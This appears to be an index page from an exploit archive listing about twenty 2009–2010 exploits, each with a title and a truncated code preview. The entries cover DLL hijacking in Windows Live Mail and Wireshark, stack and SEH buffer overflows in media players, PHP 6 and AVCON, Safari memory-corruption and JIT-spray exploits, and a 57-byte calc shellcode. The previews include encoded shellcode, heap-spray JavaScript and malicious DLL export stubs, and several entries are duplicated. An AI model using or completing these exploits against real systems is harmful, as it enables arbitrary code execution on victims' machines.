Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking

/ Exploit Title: Windows Live Email DLL Hijacking Exploit dwmapi.dll Date: 24/08/2010 Author: Nicolas Krassas http://twitter.com/Dinosn Version: Latest windows live suite Tested on: Windows XP SP3 The code is based on the exploit from "TheLeader" Vulnerable extensions: .eml .nws .rss / include...

Wireshark 1.2.10 - airpcap.dll DLL Hijacking

Wireshark 1.2.10 - airpcap.dll DLL Hijacking / Exploit Title: Wireshark define DLLIMPORT declspec dllexport DLLIMPORT void AirpcapGetDeviceList evil; DLLIMPORT void AirpcapFreeDeviceList evil; DLLIMPORT void AirpcapOpen evil; DLLIMPORT void AirpcapClose evil; DLLIMPORT void AirpcapGetLinkType evi...

QQPlayer - .asx File Processing Buffer Overflow

QQPlayer - .asx File Processing Buffer Overflow Title: QQPlayer asx File Processing Buffer Overflow Exploit Author: Li Qingshan of Information Security Engineering Center,School of Software and Microelectronics,Peking University Vendor: www.qq.com Platform: Windows XPSP3 Chinese Simplified Test:...

Safari JS JITed shellcode - exec calc ASLR/DEP bypass

Safari JS JITed shellcode - exec calc ASLR/DEP bypass. Shellcode exploit for windows platform var SPRAY=""; var JIT=" "+ "var y="+ "0x22222222^"+ / START OF OFFSET / "0x22222222^"+ "0x22222222^"+ "0x22222222^"+ "0x22222222^"+ /we don't wanna NULLS in pointer/ "0x22222222^"+ "0x22222222^"+...

Apple Safari 4.0.5 parent.close() Code Execution

Tested on: Apple Safari 4.0.5 / XP SP2 Polish Shellcode: Windows Execute Command calc Local: Yes Remote: Yes POPUP must be enabled Ctrl+Shift+K Just for fun ; -- window.open"0day.htm"; //parent.close activation self.close;...

Apple Safari 4.0.5 - parent.close() Memory Corruption Code Execution

Apple Safari 4.0.5 - parent.close Memory Corruption Code Execution Tested on: Apple Safari 4.0.5 / XP SP2 Polish Shellcode: Windows Execute Command calc Local: Yes Remote: Yes POPUP must be enabled Ctrl+Shift+K Just for fun ; -- window.open"0day.htm"; //parent.close activation self.close;...

Apple Safari 4.0.5 - 'parent.close()' Memory Corruption Code Execution

Tested on: Apple Safari 4.0.5 / XP SP2 Polish Shellcode: Windows Execute Command calc Local: Yes Remote: Yes POPUP must be enabled Ctrl+Shift+K Just for fun ; -- window.open"0day.htm"; //parent.close activation self.close;...

AVCON 4.6.8.7 Buffer Overflow

!/usr/bin/perl Exploit Title: AVCON Buffer Overflow Date: 5/7/10 Author: Dillon Beresford URL: http://www.avcon.com.cn/ Version: 4.6.8.7 Tested on: XP SP2 and SP3 CVE : NONE Code : exploit.pl Twitter: http://twitter.com/D1N Dork: site:gov.cn "AVCON" There are other bugs... This is just for fun ;-...

PHP str_transliterate()函数Unicode字符远程溢出漏洞

BUGTRAQ ID: 39185 PHP是广泛使用的通用目的脚本语言，特别适合于Web开发，可嵌入到HTML中。 远程攻击者可以通过向PHP的strtransliterate函数提交超长的Unicode字符串请求触发缓冲区溢出，导致执行任意代码。成功利用这个漏洞要求配置中打开了unicode.semantics。 PHP 6.0 dev 厂商补丁： PHP --- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.php.net view sourceprint??php errorreporting0; PHP 6....

PHP 6.0 Dev str_transliterate() Buffer Overflow

Exploit Title: PHP 6.0 Dev strtransliterate 0Day Buffer Overflow Exploit Date: 2010-04-04 Author: Pr0T3cT10n Software Link: http://downloads.sourceforge.net/project/wampserver/WampServer%202%20-%20Extensions/PHP/WampServer2-PHP6.0dev.exe?usemirror=garr Version: 6.0 Dev Tested on: WIN XP HEB SP3...

win32/xp pro sp3 (calc) 57 bytes

Exploit for win32 platform in category shellcode ================================ win32/xp pro sp3 calc 57 bytes ================================ / + win32/xp pro sp3 calc 57 bytes 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ ...

CastRipper 2.9.6.0 .wvx File Local Buffer Overflow

!/usr/bin/python CastRipper 2.9.6.0 .wvx file local BOF 0day by FB1H2S Greetz to all Darkc0de, Andhra Hackers and ICW Memebers Thanks : Mr bond,beenu,Wipu,GOdwinAustin,Theempty,hgH@x0r,r45c4l,itsecurity,eberly,Tia Shoutz : SMARTHAX0R,j4ckh4x0r,41w@r10r,Hackuin Catch us at www.andhrahackers.com or...

M.J.M. Quick Player 1.2 - Local Stack Buffer Overflow

Vulnerability : M.J.M. Quick Player v1.2 Stack BOF Discovered by : mrme seeleymagicathotmaildotcom Sploit written by : corelanc0d3r corelanc0d3ratgmaildotcom Sploit released : dec 28th, 2009 Type : local and remote code execution OS : Windows Product : M.J.M. Quick Player Versions affected : 1.2...

CastRipper (Windows XP SP2) - .m3u Local Stack Buffer Overflow

CastRipper Windows XP SP2 - .m3u Local Stack Buffer Overflow //Exploit Title: CastRipper .M3U Stack BOF WinXP SP2 - C // Date: 25/12/2009 // Author: bibi-info // Version: 2.50.70 // Tested on: Windows Xp sp2 // greetz : His0k4 & All friends & muslims HaCkersdz include include include / win32exec ...

CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3

No description provided by source. !/usr/bin/perl CastRipper 2.50.70 .plsStack buffer Overflow Exploit WinXP SP3 Exploite By : d3b4g my webpage www.d3b4g.info From tiny islands of maldivies Tested on Windows XP SP3 24.12.2009 I used Adress from SHELL32.dll.You can change it to your desired...

CastRipper 2.50.70 (.pls) Stack buffer Overflow Exploit WinXP SP3

Exploit for unknown platform in category local exploits ================================================================= CastRipper 2.50.70 .pls Stack buffer Overflow Exploit WinXP SP3 ================================================================= Title: CastRipper 2.50.70 .pls Stack buffer...

CastRipper 2.50.70 (Windows XP SP3) - .pls Local Stack Buffer Overflow

CastRipper 2.50.70 Windows XP SP3 - .pls Local Stack Buffer Overflow !/usr/bin/perl CastRipper 2.50.70 .plsStack buffer Overflow Exploit WinXP SP3 Exploite By : d3b4g my webpage www.d3b4g.info From tiny islands of maldivies Tested on Windows XP SP3 24.12.2009 I used Adress from SHELL32.dll.You ca...

Xenorate 2.50 Local Buffer Overflow

!/usr/bin/perl =gnk ============================================================================== / \ | | | | / \ | | | | / \ | | | | / \ | || | / \ | | | | / \ | | IN THE NAME OF // \ || || // \ || || ============================================================================== Xenorate...

EMC Captiva QuickScan Pro 4.6 SP1 and EMC Documentum ApllicationXtender Desktop 5.4 (keyhelp.ocx 1.2.312) - Remote Overflow

//executing calc scode = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49" & unescape"%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36" & unescape"%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34" & unescape"%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41" &...

SAP Player 0.9 (.m3u) Universal Local BOF Exploit (SEH)

Exploit for unknown platform in category local exploits ======================================================= SAP Player 0.9 .m3u Universal Local BOF Exploit SEH ======================================================= !/usr/bin/perl print qq Iranian Pentesters Home PLATEN - H.jafari - SAP playe...